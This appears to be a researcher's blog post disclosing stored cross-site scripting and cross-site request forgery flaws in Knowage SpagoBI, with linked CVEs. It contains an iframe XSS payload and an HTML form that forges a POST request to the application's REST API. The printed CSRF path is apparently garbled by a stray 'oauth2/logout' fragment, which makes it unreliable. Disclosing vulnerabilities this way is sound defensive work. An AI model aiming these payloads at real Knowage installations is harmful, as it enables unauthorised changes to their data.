Security Issues on Knowage SpagoBI
Researching the platform, me and my coworkers, Edward Amaral and Luca Ottoni, security researchers from STOLabs we have found some security issues on SpagoBI from Knowage.
Those Vulnerabilities were:
- Storage Cross-Site Script (Storaged XSS)
- Cross site Request Forgery
Before we begin, I would like to thank the Knowage company for being extremely solicitous and grateful for the research, exposing our work on their security patch page(https://www.knowage-suite.com/site/network/contributors)
First i would like to explain a bit about Cross Site Scripting (XSS)
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.
For more reading about the issue,https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
On the Proofs of concept reported below i’ve put a script tag with the alert screen showing the String ‘XSS’, just to illustrate the issue.
Being said that, let’s start the report!
1- Multiple XSS Storaged
The first cross site script was on the name input on the “Businnes Model’s Catalogue” catalogue.
The payload used was: <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
The second cross site script was on the name and description input on the “Olap Schemas’ catalogue” catalogue.
The payload used was: <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
2- Cross Site Request Forgery
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
This flaw could be seen on every form on the application common/oauth2/logoutan example would be on the /knowage/restful-services/2.0/analyticalDrivers/ path.
With the exemple code below, we forged a requisition to the server, and by making use of the users session cookies, it’s possible to make requisitions without the user knowing.
<html>
<body>
<script>history.pushState(‘’, ‘’, ‘/’)</script>
<form action=”http://<IP>:8080/knowage/restful-common/oauth2/logoutservices/2.0/analyticalDrivers/” method=”POST” enctype=”text/plain”>
<input type=”hidden” name=”{"type":"NUM","functional":true,"name":"TEST_CSRF","description":"TESTING_OF_CSRF_POC","temporal":true,"label":"TestCSRF","length":0,"typeId":29}” value=”” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>
CVEs Related to this Post:
CVE-2018–12353 — https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12353
CVE-2018–12354 — https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12354
CVE-2018–12355 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12355
